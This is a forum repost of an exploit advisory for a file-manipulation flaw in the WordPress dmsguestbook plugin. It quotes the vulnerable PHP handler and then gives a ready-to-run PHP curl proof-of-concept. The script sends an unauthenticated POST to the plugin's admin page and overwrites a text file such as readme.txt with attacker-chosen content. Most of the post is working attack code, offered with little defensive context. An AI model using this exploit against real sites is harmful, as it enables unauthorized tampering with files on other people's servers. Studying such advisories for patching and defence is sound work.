Aerosol Posted December 30, 2014 Report Posted December 30, 2014 http://packetstormsecurity.com/user/evex/Author:EvexTitle:WordPress dmsguestbook Plugin File ManipulationDescription:wordpress dmsguestbook plugin is vulnerable to a file manipulation securityissueit allows an unauthenicated attacker to put text into existing text filesonly<?php/*Vulnerability Code: if ($POSTVARIABLE['action'] =='save_advanced_data') { $abspath = str_replace("\\","/", ABSPATH); // check the folder variable if($POSTVARIABLE['folder']=="language/"){ $folder="language/"; } else {$folder="";} // check the file variable xxxx.txt if(preg_match('/^[a-z0-9]+\.+(txt)/i', $POSTVARIABLE['file'])==1) { $file=$POSTVARIABLE['file']; } else {$file="";} clearstatcache(); if (file_exists($abspath . "wp-content/plugins/dmsguestbook/" .$folder . $file)) { $handle = fopen($abspath . "wp-content/plugins/dmsguestbook/" .$folder . $file, "w"); $writetofile = str_replace("\\", "",$POSTVARIABLE['advanced_data']); fwrite($handle, $writetofile); fclose($handle); message("<b>" . __("saved", "dmsguestbook") . "...</b>",300,800); } else {message("<br /><b>" . __("File not found!", "dmsguestbook"). "</b>",300,800);} }*/$TEXTTOINJECT = 'INPUT TEXT HERE';$TXTFILE = 'readme.txt'; #localhost/wp-content/plugins/dmsguestbook/readme.txt$url = "http://localhost/x/wordpress";$ch = curl_init();curl_setopt($ch,CURLOPT_POST,true);curl_setopt($ch,CURLOPT_POSTFIELDS,"action=save_advanced_data&file=$TXTFILE&advanced_data=$TEXTTOINJECT");curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOPT_URL,$url.'/wp-admin/admin.php?page=dmsguestbook');curl_exec($ch);echo "Payload Sent\nUrl: $url/wp-content/plugins/dmsguestbook/readme.txt";?>Source Quote
